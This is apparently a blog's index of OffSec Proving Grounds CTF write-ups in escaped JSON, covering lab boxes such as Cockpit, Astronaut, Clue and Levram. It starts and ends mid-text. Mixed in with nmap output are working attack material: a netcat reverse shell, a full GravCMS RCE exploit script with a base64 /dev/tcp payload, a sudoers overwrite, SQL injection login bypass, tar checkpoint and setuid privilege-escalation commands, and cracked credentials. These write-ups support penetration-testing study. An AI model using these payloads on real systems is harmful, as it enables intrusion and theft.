f\u0026#34;hi {name}\u0026#34; @app.register async def yield_data(max_num: int) -\u0026gt; AsyncGenerator[int, None]: for i in range(max_num): yield i D = TypedDict(\u0026#34;D\u0026#34;, {\u0026#34;key\u0026#34;: str, \u0026#34;other-key\u0026#34;: str}) @app.register async def query_dict(value: str) -\u0026gt; D: return {\u0026#34;key\u0026#34;: value, \u0026#34;other-key\u0026#34;: value} if __name__ == \u0026#34;__main__\u0026#34;: uvicorn.run(app, interface=\u0026#34;asgi3\u0026#34;, port=65432 lets check if there is any exploit for this\nexec_command(‘echo “user ALL=(root) NOPASSWD: ALL” \u0026gt; /etc/sudoers’)\nannd boom\n","date":"20 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pc/","section":"CTF Writeups","summary":"","title":"pc","type":"ctf-writeups"},{"content":" law # Overview # OS: Linux IP: 192.168.102.190 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE with modification + privesc with cron.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # ok so none of the exploits were working for some reason so i decided to pull out burp and give it a go manually\nchanging the redirec to / seemed to have fixed it for me since that php page didnt really exist\nnc -e /bin/sh 192.168.45.159 9001\nand boom we have our reverse shell\n","date":"19 March 2026","externalUrl":null,"permalink":"/ctf-writeups/law/","section":"CTF Writeups","summary":"","title":"law","type":"ctf-writeups"},{"content":" Crane # Overview # OS: Linux IP: 192.168.192.146 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy adminadmin and exploit rce privesc with sudo -l.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nadmin admin just let us in lol\nfound this cve for it\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\ninteresting\nand GTFO bins had one for this boom\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/crane/","section":"CTF Writeups","summary":"","title":"Crane","type":"ctf-writeups"},{"content":" Extplorer # Overview # OS: Linux IP: 192.168.192.27 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # easy php shell esc privs with exposed pass in config and disk perm for privesc.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 80 # Exploitation # file manager takes us here\nso simple\nif( !defined( \u0026#39;_JEXEC\u0026#39; ) \u0026amp;\u0026amp; !defined( \u0026#39;_VALID_MOS\u0026#39; ) ) die( \u0026#39;Restricted access\u0026#39; ); $GLOBALS[\u0026#34;users\u0026#34;]=array( array(\u0026#39;admin\u0026#39;,\u0026#39;21232f297a57a5a743894a0e4a801fc3\u0026#39;,\u0026#39;/var/www/html\u0026#39;,\u0026#39;http://localhost\u0026#39;,\u0026#39;1\u0026#39;,\u0026#39;\u0026#39;,\u0026#39;7\u0026#39;,1), array(\u0026#39;dora\u0026#39;,\u0026#39;$2a$08$zyiNvVoP/UuSMgO2rKDtLuox.vYj.3hZPVYq3i4oG3/CtgET7CjjS\u0026#39;,\u0026#39;/var/www/html\u0026#39;,\u0026#39;http://localhost\u0026#39;,\u0026#39;1\u0026#39;,\u0026#39;\u0026#39;,\u0026#39;0\u0026#39;,1), lets try cracking first, if that doesnt work then lets msql\nwell that was quick\nlets su\nthat worked, now lets run linpeas\nlets try this cuz we have disk priv\nhttps://www.hackingarticles.in/disk-group-privilege-escalation/\nwe only have read perms hmm\ncracking this gave us the pass as explorer\neasy\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/extplorer/","section":"CTF Writeups","summary":"","title":"Extplorer","type":"ctf-writeups"},{"content":" Hub # Overview # OS: Linux IP: 192.168.105.25 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # It was just a simple exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http nginx 1.18.0 |_http-title: 403 Forbidden |_http-server-header: nginx/1.18.0 6309/tcp filtered unknown 6840/tcp filtered unknown 8082/tcp open http Barracuda Embedded Web Server |_http-title: Home |_http-server-header: BarracudaServer.com (Posix) | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK | http-webdav-scan: | Server Type: BarracudaServer.com (Posix) | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK | Server Date: Tue, 17 Mar 2026 13:47:25 GMT |_ WebDAV type: Unknown 9999/tcp open ssl/http Barracuda Embedded Web Server | ssl-cert: Subject: commonName=FuguHub/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:FuguHub, DNS:FuguHub.local, DNS:localhost | Not valid before: 2019-07-16T19:15:09 |_Not valid after: 2074-04-18T19:15:09 | http-webdav-scan: | Server Type: BarracudaServer.com (Posix) | Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, PATCH, POST, PUT, COPY, DELETE, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK | Server Date: Tue, 17 Mar 2026 13:47:25 GMT |_ WebDAV type: Unknown |_http-server-header: BarracudaServer.com (Posix) |_http-title: Home | http-methods: |_ Potentially risky methods: PROPFIND PATCH PUT COPY DELETE MOVE MKCOL PROPPATCH LOCK UNLOCK 10477/tcp filtered unknown Dirbusting # Port 8082 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # we set the admin account as admin:admin1234\nhttps://github.com/SanjinDedic/FuguHub-8.4-Authenticated-RCE-CVE-2024-27697\nnow clicking on about gives us a shell\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/hub/","section":"CTF Writeups","summary":"","title":"Hub","type":"ctf-writeups"},{"content":" Levram # Overview # OS: Linux IP: 192.168.192.24:8000 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # exploit RCE default admin admin —\u0026gt; privesc with cap.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 8000/tcp open http WSGIServer 0.2 (Python 3.10.6) |_http-cors: GET POST PUT DELETE OPTIONS PATCH |_http-title: Gerapy |_http-server-header: WSGIServer/0.2 CPython/3.10.6 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Exploitation # admin admin just gets us in\nusing a poc we found online we are in just like that\nlinpeas showed us that we had cap set\n[sudo] password for app: sudo: 3 incorrect password attempts app@ubuntu:/tmp$ /usr/bin/python3.10 -c \u0026lsquo;import os; os.setuid(0); os.system(\u0026quot;/bin/bash\u0026quot;)\u0026rsquo; \u0026lt;c \u0026lsquo;import os; os.setuid(0); os.system(\u0026quot;/bin/bash\u0026quot;)\u0026rsquo; root@ubuntu:/tmp# cat /root/proof.txt cat /root/proof.txt fddf6d6324241b01d6f2eda82dd68640 root@ubuntu:/tmp#\n","date":"17 March 2026","externalUrl":null,"permalink":"/ctf-writeups/levram/","section":"CTF Writeups","summary":"","title":"Levram","type":"ctf-writeups"},{"content":" Codo # Overview # OS: Linux IP: 192.168.192.23 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # default creds on web portal —\u0026gt; file upload —\u0026gt; exposed creds.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # admin admin default creds worked lmaooo\nwe find this\nhttps://www.exploit-db.com/exploits/50978\nmade some changes here\nand then accessed the payload\nwe just used a simple pentestmonkey rev shell btw\nanyways we are in\nPrivESC # ","date":"16 March 2026","externalUrl":null,"permalink":"/ctf-writeups/codo/","section":"CTF Writeups","summary":"","title":"Codo","type":"ctf-writeups"},{"content":" Clue # Overview # OS: Linux IP: 192.168.205.240 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Clue, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65529 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA) |_ 256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA) 80/tcp open http Apache httpd 2.4.38 |_http-server-header: Apache/2.4.38 (Debian) |_http-title: 403 Forbidden 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 3000/tcp open http Thin httpd |_http-server-header: thin |_http-title: Cassandra Web 8021/tcp open freeswitch-event FreeSWITCH mod_event_socket Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: | smb2-time: | date: 2026-03-15T11:55:55 |_ start_date: N/A | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: clue | NetBIOS computer name: CLUE\\x00 | Domain name: pg | FQDN: clue.pg |_ System time: 2026-03-15T07:55:56-04:00 | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required |_clock-skew: mean: 1h20m01s, deviation: 2h18m35s, median: 0s TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 86.39 ms 192.168.45.1 2 86.35 ms 192.168.45.254 3 86.45 ms 192.168.251.1 4 86.46 ms 192.168.205.240 OS and Service detection performed. Please report any incorrect results at https://nm Dirbusting # Port 80 # CVE 2021 44521\nPort 8021 Free Switch # 8021/tcp open freeswitch-event FreeSWITCH mod_event_socke\nok so the password seems to be different fromhe default ClueCon\nso i used searchsploit and came across a read file exploit for cassandra web, and guessed yo this might let us read that config file for the password, and here we are\nlets move to exploitation section now\nExploitation # ok so we have the password\nwe can also\nwhich gives us the pass for cassandra as SecondBitetheApple330\nthe password is StrongClueConEight021 great\nand we are in\ni wasnt getting a connect bac, BUT ONUSING A OPEN PORT 3000 for cassandra i GOT IT, ALWAYS USE OPEN PORTS GUYS\nlets try changing our user to cassie\nwget is buuustedddd\nwe are able to su to cassie with the prev creds and\nrun linpeas\nthere is an id sitting here almost as if it was intentionally put there for us to use because its not supposed to be here by default\nso lets use it for the 2 people that are allowed to access root and anthoyn via ssh\nand boom it worked for root\n","date":"15 March 2026","externalUrl":null,"permalink":"/ctf-writeups/clue/","section":"CTF Writeups","summary":"","title":"Clue","type":"ctf-writeups"},{"content":" Cockpit # Overview # OS: Linux IP: 192.168.205.10 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # This writeup covers the full attack path for Cockpit, including enumeration, exploitation, and privilege escalation.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # ──(kali㉿kali)-[~/Desktop/Boxes/Offsec/cockpit] └─$ nmap 192.168.205.10 -sCV -p- -Pn --min-rate=20000 -A Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-15 11:28 EDT Nmap scan report for 192.168.205.10 Host is up (0.083s latency). Not shown: 65412 closed tcp ports (reset), 120 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: blaze 9090/tcp open http Cockpit web service 198 - 220 |_http-title: Did not follow redirect to https://192.168.205.10:9090/ Device type: general purpose|router Dirbusting # I expanded the attack surface with content discovery and followed only the valid hits.\nPort 9090 # I validated this step using the evidence below before moving forward in the chain.\nPort 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # great so we have sqli\nok wha so when i left the pass field empy and tried this\n' UNION SELECT NULL,NULL,NULL,NULL,NULL--\nwe just got thru\nlooks like b64\njames:canttouchhhthiss@455152 cameron:thisscanttbetouchedd@455152 we were not ablet to ssh with this creds\non logging in we were able to add ourseleves here so thats great\nnow we can ssh in, lets do the same for cameron\nok so only james seem to have worked wow\nok so we can are bascally archiving the backup.atr.gz *\nlets just append that command with our liner and call it a day\nsudo /usr/bin/tar -czvf /tmp/backup.tar.gz * \u0026ndash;checkpoint=1 \u0026ndash;checkpoint-action=exec=\u0026quot;/bin/sh”\nanother way would have been abusing the wildcard\necho \u0026#39;cp /bin/bash /tmp/bash; chmod +s /tmp/bash\u0026#39; \u0026gt; /home/james/shell.sh echo \u0026#34;\u0026#34; \u0026gt; \u0026#34;--checkpoint-action=exec=sh shell.sh\u0026#34; echo \u0026#34;\u0026#34; \u0026gt; --checkpoint=1 /tmp/bash -p ","date":"15 March 2026","externalUrl":null,"permalink":"/ctf-writeups/cockpit/","section":"CTF Writeups","summary":"","title":"Cockpit","type":"ctf-writeups"},{"content":" Astronaut # Overview # OS: Linux IP: 192.168.133.12 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # exploit rce then priversc withs uid set.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 | http-ls: Volume / | SIZE TIME FILENAME | - 2021-03-17 17:46 grav-admin/ |_ |_http-title: Index of / |_http-server-header: Apache/2.4.41 (Ubuntu) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 82.07 ms 192.168.45.1 2 82.03 ms 192.168.45.254 3 82.12 ms 192.168.251.1 4 82.16 ms 192.168.133.12 | ssh-hostkey: | 3072 98:4e:5d:e1:e6:97:29:6f:d9:e0:d4:82:a8:f6:4f:3f (RSA) | 256 57:23:57:1f:fd:77:06:be:25:66:61:14:6d:ae:5e:98 (ECDSA) |_ 256 c7:9b:aa:d5:a6:33:35:91:34:1e:ef:cf:61:a8:30:1c (ED25519) 80/tcp open http Apache httpd 2.4.41 | http-ls: Volume / | SIZE TIME FILENAME | - 2021-03-17 17:46 grav-admin/ |_ |_http-title: Index of / |_http-server-header: Apache/2.4.41 (Ubuntu) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: Host: 127.0.0.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 995/tcp) HOP RTT ADDRESS 1 82.07 ms 192.168.45.1 2 82.03 ms 192.168.45.254 3 82.12 ms 192.168.251.1 4 82.16 ms 192.168.133.12 Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nCant really find the version so lets look up some exploits\nlets try these ones ouit\nLets change accordingly\nExploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) ## Original Exploit Author: Mehmet Ince ## Vendor Homepage: https://getgrav.org ## Version: 1.10.7 ## Tested on: Debian 10 ## Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= \u0026#34;http://192.168.1.2\u0026#34; #Change base64 encoded value with with below command. #echo -ne \u0026#34;bash -i \u0026gt;\u0026amp; /dev/tcp/192.168.1.3/4444 0\u0026gt;\u0026amp;1\u0026#34; | base64 -w0 payload=b\u0026#34;\u0026#34;\u0026#34;/*\u0026lt;?php /**/ file_put_contents(\u0026#39;/tmp/rev.sh\u0026#39;,base64_decode(\u0026#39;YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE=\u0026#39;));chmod(\u0026#39;/tmp/rev.sh\u0026#39;,0755);system(\u0026#39;bash /tmp/rev.sh\u0026#39;); \u0026#34;\u0026#34;\u0026#34; s = requests.Session() r = s.get(target+\u0026#34;/admin\u0026#34;) adminNonce = re.search(r\u0026#39;admin-nonce\u0026#34; value=\u0026#34;(.*)\u0026#34;\u0026#39;,r.text).group(1) if adminNonce != \u0026#34;\u0026#34; : url = target + \u0026#34;/admin/tools/scheduler\u0026#34; data = \u0026#34;admin-nonce=\u0026#34;+adminNonce data +=\u0026#39;\u0026amp;task=SaveDefault\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22\u0026#39;+base64.b64encode(payload).decode(\u0026#39;utf-8\u0026#39;)+\u0026#39;%22%29%29%3b\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=\u0026amp;data%5bstatus%5d%5bncefs%5d=enabled\u0026amp;data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append\u0026#39; headers = {\u0026#39;Content-Type\u0026#39;: \u0026#39;application/x-www-form-urlencoded\u0026#39;} r = s.post(target+\u0026#34;/admin/config/scheduler\u0026#34;,data=data,headers=headers) lets replace with this\nok so i was getting some None type error for some reason, read the code and realized why, was suppose to give the path to http://ip/grav-admin and let it append /admin\nanyways we got our initial foothold\nPrivEsc # lets run linpeas and see if we come across anything interesting\nhmm it seems to be\ngo to /var/www/html/grav-admin\nexecute /usr/bin/php bin/grav scheduler 1\u0026raquo; /dev/null 2\u0026gt;\u0026amp;1\nwe could either change the grav file to a revshell and have it execute it if we have perms to edit the grav file,\nor we can spawn like this\nphp -r \u0026lsquo;system(\u0026quot;/bin/sh -i\u0026quot;);’\nand that gives us the root shell\n","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/astronaut/","section":"CTF Writeups","summary":"","title":"Astronaut","type":"ctf-writeups"},{"content":" BlackGate # Overview # OS: Linux IP: 192.168.133.176 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # redis based rce and privesc with pwnkit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 37:21:14:3e:23:e5:13:40:20:05:f9:79:e0:82:0b:09 (RSA) | 256 b9:8d:bd:90:55:7c:84:cc:a0:7f:a8:b4:d3:55:06:a7 (ECDSA) |_ 256 07:07:29:7a:4c:7c:f2:b0:1f:3c:3f:2b:a1:56:9e:0a (ED25519) 6379/tcp open redis Redis key-value store 4.0.14 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1720/tcp) HOP RTT ADDRESS 1 90.11 ms 192.168.45.1 2 90.08 ms 192.168.45.254 3 90.15 ms 192.168.251.1 4 90.20 ms 192.168.133.176 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.38 seconds Dirbusting # Port 80 # Exploitation # using this we have our shell\nwe can run redis-status binary apparently lets check that out\n$ sudo -l nMatching Defaults entries for prudence on blackgate: env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin User prudence may run the following commands on blackgate: (root) NOPASSWD: /usr/local/bin/redis-status $ strings /usr/local/bin/redis-status n/lib64/ld-linux-x86-64.so.2 gets puts printf stderr system fwrite strcmp __libc_start_main libc.so.6 GLIBC_2.2.5 __gmon_start__ H=X@@ []A\\A]A^A_ we are able to escalate our privs with a kernel exploit\n","date":"14 March 2026","externalUrl":null,"permalink":"/ctf-writeups/blackgate/","section":"CTF Writeups","summary":"","title":"BlackGate","type":"ctf-writeups"},{"content":" Boolean # Overview # OS: Linux IP: 192.168.100.230 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # bypassed acc confirmation + LFi, access with ssh and priv esc with ssh.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # $ nmap 192.168.133.231 -sCV -A -p- -Pn --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-14 15:39 EDT Nmap scan report for 192.168.133.231 Host is up (0.088s latency). Not shown: 65531 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | ssh-hostkey: | 2048 37:80:01:4a:43:86:30:c9:79:e7:fb:7f:3b:a4:1e:dd (RSA) | 256 b6:18:a1:e1:98:fb:6c:c6:87:55:45:10:c6:d4:45:b9 (ECDSA) |_ 256 ab:8f:2d:e8:a2:04:e7:b7:65:d3:fe:5e:93:1e:03:67 (ED25519) 80/tcp open http | http-title: Boolean |_Requested resource was http://192.168.133.231/login | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, GenericLines, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: | HTTP/1.1 400 Bad Request | FourOhFourRequest, GetRequest, HTTPOptions: | HTTP/1.0 403 Forbidden | Content-Type: text/html; charset=UTF-8 |_ Content-Length: 0 3000/tcp closed ppp 33017/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Development |_http-server-header: Apache/2.4.38 (Debian) 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port80-TCP:V=7.95%I=7%D=3/14%Time=69B5B98A%P=x86_64-pc-linux-gnu%r(GetR SF:equest,55,\u0026#34;HTTP/1\\.0\\x20403\\x20Forbidden\\r\\nContent-Type:\\x20text/html; SF:\\x20charset=UTF-8\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(HTTPOptions,55,\u0026#34;H SF:TTP/1\\.0\\x20403\\x20Forbidden\\r\\nContent-Type:\\x20text/html;\\x20charset= SF:UTF-8\\r\\nContent-Length:\\x200\\r\\n\\r\\n\u0026#34;)%r(RTSPRequest,1C,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(X11Probe,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\ SF:x20Request\\r\\n\\r\\n\u0026#34;)%r(FourOhFourRequest,55,\u0026#34;HTTP/1\\.0\\x20403\\x20Forbid SF:den\\r\\nContent-Type:\\x20text/html;\\x20charset=UTF-8\\r\\nContent-Length:\\ SF:x200\\r\\n\\r\\n\u0026#34;)%r(GenericLines,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\ SF:n\\r\\n\u0026#34;)%r(RPCCheck,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(D SF:NSVersionBindReqTCP,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r( SF:DNSStatusRequestTCP,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r( SF:Help,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(SSLSessionReq,1 SF:C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TerminalServerCookie, SF:1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TLSSessionReq,1C,\u0026#34;HT SF:TP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(Kerberos,1C,\u0026#34;HTTP/1\\.1\\x20 SF:400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(SMBProgNeg,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Ba SF:d\\x20Request\\r\\n\\r\\n\u0026#34;)%r(LPDString,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Reque SF:st\\r\\n\\r\\n\u0026#34;)%r(LDAPSearchReq,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n SF:\\r\\n\u0026#34;)%r(LDAPBindReq,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r SF:(SIPOptions,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(LANDesk- SF:RC,1C,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\n\\r\\n\u0026#34;)%r(TerminalServer,1C 